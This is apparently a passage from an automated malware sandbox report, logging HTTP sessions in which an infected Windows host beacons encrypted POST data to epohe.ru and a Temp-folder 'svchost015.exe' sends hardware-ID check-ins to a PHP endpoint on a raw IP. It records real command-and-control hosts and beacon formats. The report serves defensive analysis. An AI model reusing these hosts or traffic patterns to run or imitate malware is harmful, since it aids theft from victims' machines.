6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	49761	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:50.790874004 CEST	269	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://pwnffqufngll.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: epohe.ru
Sep 2, 2024 11:42:50.790896893 CEST	117	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 58 01 a0 f5 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuX@D 0)q
Sep 2, 2024 11:42:51.699743986 CEST	219	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:51 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 1c 7d 51 ba 3c 0b e9 f3 51 fa 91 ee af 36 d9 2f d9 e8 22 59 14 c1 d3 dd 9d 3c 83 66 5b 1b 90 11 9e 50 68 54 51 af 88 7c e1 7e ed 42 0e 1b 39 06 13 9c 3d a7 23 06 bc Data Ascii: #\6}Q<Q6/"Y<f[PhTQ\|~B9=#

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	49764	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:55.538932085 CEST	271	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://sxaiuwdsglaywc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 226 Host: epohe.ru
Sep 2, 2024 11:42:55.538964987 CEST	226	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2c 5b 1d 6b 2c 90 f4 76 0b 75 2b 49 d6 89 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA ,[k,vu+IZ*cBxt6k(_vv?)g-Mgm7A(0Sskkg_<TFV1Lenpqp!7
Sep 2, 2024 11:42:56.442466974 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:56 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	49765	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:56.528613091 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://wuipisboawsvs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 267 Host: epohe.ru
Sep 2, 2024 11:42:56.528635979 CEST	267	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 3d 34 a6 e5 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vu=4;tpcy9V>TZ!#Z09[;L`5Qm<bnyC&zC_>%ND8WM[X`\|H
Sep 2, 2024 11:42:57.435973883 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:57 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	49766	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:42:57.452656031 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://kvkvjbbqhfudfxqw.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 140 Host: epohe.ru
Sep 2, 2024 11:42:57.452670097 CEST	140	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 4d 5a ec b7 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA -[k,vuMZjRxJvX:=RP:PSWty~
Sep 2, 2024 11:42:58.474567890 CEST	475	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:42:58 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	49767	91.202.233.158	80	7940	C:\Users\user\AppData\Local\Temp\svchost015.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:43:00.359291077 CEST	89	OUT	GET / HTTP/1.1 Host: 91.202.233.158 Connection: Keep-Alive Cache-Control: no-cache
Sep 2, 2024 11:43:01.015923023 CEST	203	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 09:43:00 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 2, 2024 11:43:01.020457029 CEST	415	OUT	POST /e96ea2db21fa9a1b.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----GDGDHJJDGHCAAAKEHIJK Host: 91.202.233.158 Content-Length: 214 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 42 34 37 34 35 32 37 35 38 35 43 33 36 31 35 30 33 30 31 31 36 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 0d 0a 2d 2d 2d 2d 2d 2d 47 44 47 44 48 4a 4a 44 47 48 43 41 41 41 4b 45 48 49 4a 4b 2d 2d 0d 0a Data Ascii: ------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="hwid"0B474527585C3615030116------GDGDHJJDGHCAAAKEHIJKContent-Disposition: form-data; name="build"default------GDGDHJJDGHCAAAKEHIJK--
Sep 2, 2024 11:43:01.253674984 CEST	210	IN	HTTP/1.1 200 OK Date: Mon, 02 Sep 2024 09:43:01 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 8 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 59 6d 78 76 59 32 73 3d Data Ascii: YmxvY2s=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	49768	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:03.394293070 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jedxkbbxtvyjefdy.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 225 Host: epohe.ru
Sep 2, 2024 11:44:03.394335032 CEST	225	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 30 54 e5 e7 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu0ThztAh*V$=eY(k~G/c A@zPZ]\P(De2U\[E1IigWG
Sep 2, 2024 11:44:04.317811966 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:04 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	49769	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:05.049413919 CEST	268	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mgxufuqrjem.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 227 Host: epohe.ru
Sep 2, 2024 11:44:05.049464941 CEST	227	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2d 1c c0 af Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu-7Cjnu Q/k cb"fy0A~"JU&g`$g(FWxPOo2m\1WXzOY
Sep 2, 2024 11:44:06.073779106 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:05 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	49770	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:06.356914997 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jugejrjfmrsbqcyx.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 246 Host: epohe.ru
Sep 2, 2024 11:44:06.356957912 CEST	246	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 21 2e e3 99 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu!.^_BOze4>4qB7u1SHZ)+[Gd8H1\|JD/)]k0,^Bq`tHB0e\|)F
Sep 2, 2024 11:44:07.581283092 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r
Sep 2, 2024 11:44:07.581549883 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:07 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	49771	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:12.082320929 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://mgcnjvitwupuplla.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 163 Host: epohe.ru
Sep 2, 2024 11:44:12.082345009 CEST	163	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 7a 5a c9 f7 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuzZG[ts&0Z./g%+]7IN"c
Sep 2, 2024 11:44:12.998900890 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:12 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	49772	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:17.668303013 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://veyluekclhthgug.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 111 Host: epohe.ru
Sep 2, 2024 11:44:17.668315887 CEST	111	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 76 4b ee 8e Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuvKk$pi#5u5t]
Sep 2, 2024 11:44:18.565588951 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:18 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	49773	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:23.028577089 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xdpeyvjwjcxoduxb.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: epohe.ru
Sep 2, 2024 11:44:23.028598070 CEST	348	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 3c 28 b4 aa Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vu<(b_hw4G4y:&uxX{A5<4GUb1%c^/,\H%d,hRQ;v^cdC2#Og'(Ca
Sep 2, 2024 11:44:23.938311100 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:23 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.4	49774	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:28.636660099 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ngmwxgboyrumd.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 363 Host: epohe.ru
Sep 2, 2024 11:44:28.636702061 CEST	363	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 27 e8 e8 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vun'Z7htgNr OuwF}$c}\]9 *F)LkB$>0Y8RM2TMiWi;- r@lm?_M7r0
Sep 2, 2024 11:44:29.746076107 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:29 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.4	49775	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:34.418683052 CEST	273	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://dppdsmckyoiatanc.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 246 Host: epohe.ru
Sep 2, 2024 11:44:34.418730021 CEST	246	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 5d e3 96 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuf]MOUB4cu3w#5l"E1"J.VMHU,)\|\HSy3wY+$"Q\|\|dTH`-sZ
Sep 2, 2024 11:44:35.445287943 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:35 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.4	49776	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:40.828445911 CEST	272	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iunavucrkiocdvg.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 201 Host: epohe.ru
Sep 2, 2024 11:44:40.828496933 CEST	201	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6e 1d aa 83 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuncbr{#@RAd$OCA,Y+Zn(0E96URPdlsIK
Sep 2, 2024 11:44:41.738900900 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:41 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.4	49777	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 11:44:46.388853073 CEST	270	OUT	POST /tmp/ HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://weelpnjtteeqb.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 148 Host: epohe.ru
Sep 2, 2024 11:44:46.388881922 CEST	148	OUT	Data Raw: 3b 6e 58 19 80 bb 1d 54 ad aa b4 70 02 70 0e c9 79 02 ce e2 63 71 9f 11 7b 0e 7d 91 49 c4 b4 6f 9a 2b b5 29 07 69 20 69 e8 97 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 18 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6f 09 d2 90 Data Ascii: ;nXTppycq{}Io+)i i? 9Yt M@NA .[k,vuofUBxg\|u%Euj[]U,KPN,nIVXDA>h
Sep 2, 2024 11:44:47.293251038 CEST	151	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.0 Date: Mon, 02 Sep 2024 09:44:47 GMT Content-Type: text/html; charset=utf-8 Connection: close Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.4	49778	102.189.104.201	80	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
